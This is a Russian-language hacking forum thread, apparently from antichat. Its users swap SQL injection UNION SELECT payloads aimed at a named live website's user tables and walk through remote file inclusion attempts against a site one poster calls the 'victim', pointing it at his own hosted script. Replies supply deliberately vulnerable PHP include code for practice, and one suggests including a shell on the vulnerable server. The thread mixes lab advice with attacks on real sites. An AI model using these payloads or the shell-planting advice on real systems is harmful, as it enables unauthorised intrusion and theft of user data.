Code: -34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyUsers’ +LIMIT+[COLOR=Red]1[/COLOR],1-- почитать можно тут: https://forum.antichat.ru/thread43966.html
правильнее этот запрос: Code: http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations+where+1%00 выдает открывает страницу норм, но там нету ни одного visible поля (((
наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции. у меня сайт такой: www.mysite.ru цель: www.123.ru на мой сайт залил скрипт: Code: <? .. Include ("$page.php"); … ?> открываю сайт жертвы, захожу в любой раздел и получаю такой адрес: http://www.123.ru/index.php?action=page&id=149 мой код на сервере под названием ххх.php. я переделываю ссылку так: http://www.123.ru/index.php?action=http://mysite.ru/xxx.php - открывается главная страница. делаю так: http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php пишет: Запрашиваемая вами страница не найдена. Я ошибку делаю, или просто на сайте фильтровывается ? P.S. читал здесь: http://forum.antichat.ru/thread12123-lfi.html
что то ты путаешь, с чего ты взял что переменная id на сайте www.123.ru вообще что-то инклюдит, тем более что-то удаленное?
Там вообще показаны примеры инклуда на твоем сервере. Чувствую я, что ты ничего не понимаешь в этом...
B1t.exe сделай на локалке что то подобное PHP: <?php $page = $_GET['page']; include($page); ?> и попробуй заюзать script.php?page=[inj]
На локалхосте поэксперементируй с LFI, а что у тя есть исходники страницы 123.ru/...., откуда ты узнал что id именно инклудится?
Для удаленного инклуда на срвере должен быть включен allow_url_include. В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный. P.S.: Почитай лутше вот эту статью: http://forum.antichat.ru/thread23501.html В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО.
я не понимаю .. на локалке. т.е. ? на свем компе ? зачем? я залил этот скрипт на сервер (интернет) и при запросе www.mysite.ru/ххх.php Я не знаю что там есть, просто в статье написан, что пыполните это на удаленном сервере и если выдаст те ошибки, значит инклюд есть. по этому и я так делал.
Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ... там,где якобы уязвимость.
2B1t.exe, омг. PHP: <? Include ("$page.php"); ?> Точки забыл убрать) Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена. Затем можешь заюзать такой скриптек: PHP: <? $inc = $_GET['file']; include ($inc); ?> И реализовуй: Code: localhost/script.php?file=http://google.com Затем постепенно усложняй: PHP: <? $inc = $_GET['file']; if(file_exists($inc)) { include ($inc); } else { echo 'ERROR!'; } ?> И снова реализовуй: Code: localhost/script.php?file=ftp://login:pass@host/file.php И так далее. Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w: https://forum.antichat.ru/thread106780.html По аналогии и с ЛФИ, нy кароче ты понял)
Сомневаюсь... B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.
))))))) ага, точно ! спасибо большое. У меня на этом сервере нет ничего. я специально брал домен и хост для тренировки. хост конечно, бесплатный, но поддерживает почти все, что надо.